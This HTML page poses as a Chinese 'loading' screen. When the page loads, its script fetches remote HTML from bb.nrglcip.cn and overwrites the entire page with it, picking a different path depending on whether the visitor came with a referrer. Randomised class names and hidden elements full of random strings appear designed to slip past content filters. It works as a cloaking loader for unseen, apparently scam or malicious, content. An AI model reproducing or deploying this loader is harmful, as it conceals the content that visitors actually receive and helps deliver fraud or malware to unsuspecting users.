<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .weUQRq {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .weUQRq .yD6dlVi {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .weUQRq .content {
            line-height: 50px;
            text-align: center
        }

        .weUQRq .img {
            width: 100%
        }

        .weUQRq .LFy3PThjU {
            text-align: center
        }

        .weUQRq .LFy3PThjU span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .weUQRq .LFy3PThjU span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .weUQRq .LFy3PThjU span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .weUQRq .LFy3PThjU span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .weUQRq .LFy3PThjU span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .weUQRq .LFy3PThjU span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .weUQRq .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function L1ZcnwAHv(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var L13Go = L1ZcnwAHv('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ L13Go +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ L13Go +".html?a=share";
		}
		
        vMw0zEj3p=url+"#"+new Date().getTime();
        vMw0zEj3p && function() {
            $.get(vMw0zEj3p, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>TT4qIs5Kjrg56f9CAHR0LpxbTUkTCmrVmbUJfMHM2yUkbq2NegmBNDo0Y69On67C4eZ1Y9gaY7xYCn</p>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>kNQoavJrO2Ak</a>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>kNQoavJrO2Ak</a>
<h1 style='display:none' >huGSMEIJrdSc2DgbqSj3x0FPM19wsvBgJnhtjRXpcp0cAGy2yITlxmUgBwQgqQU30K1ouHNo6Th0zXGzcB</h1>
<a  href='#' style='display:none'>kNQoavJrO2Ak</a>
<span style='display:none'>kBNS00xFRlycEI1NtzJhxXunDTgVr7e5VZ306qkP3pdn1WKG8es48uSHiz7XpEMoGDfChB63Eptyu1PC0Z632XEj</span><div class="weUQRq">
    <div class="yD6dlVi">
        <div class="LFy3PThjU">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >bmaZLrusNpVASNVnbgLffb3jMcsYfAcrli5KK6hRvtNJr1gJysbONcnrZVLxkQRfIGp6QoGaASYGx3ejpojilKISEaChB9v</b>
<h1 style='display:none' >eT5GVGBUvOsmvSYcotJqtwdcK2NFJHXcsMHSiI4YH7xYnFitymlTdBC</h1>
<h1 style='display:none' >eT5GVGBUvOsmvSYcotJqtwdcK2NFJHXcsMHSiI4YH7xYnFitymlTdBC</h1>
<div style='display:none'>B1SW7F3JIbccUBpMnaSHIiu7ChbZvhhdDRvDjxCpEVUDvGd37695kOgcOrwCEMp60rVJEdvGkZlBTXuW7LlJjPtrhs6fXey</div>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<p  style='display:none'>ZlvtFI86MDsrISeGNdathd0OYsp80sEmHTvV0MA8dF9tG1JJBxL2iMH</p>
<p  style='display:none'>ZlvtFI86MDsrISeGNdathd0OYsp80sEmHTvV0MA8dF9tG1JJBxL2iMH</p>
<span style='display:none'>eJMWxghW592jIyfWG</span></body>
</html>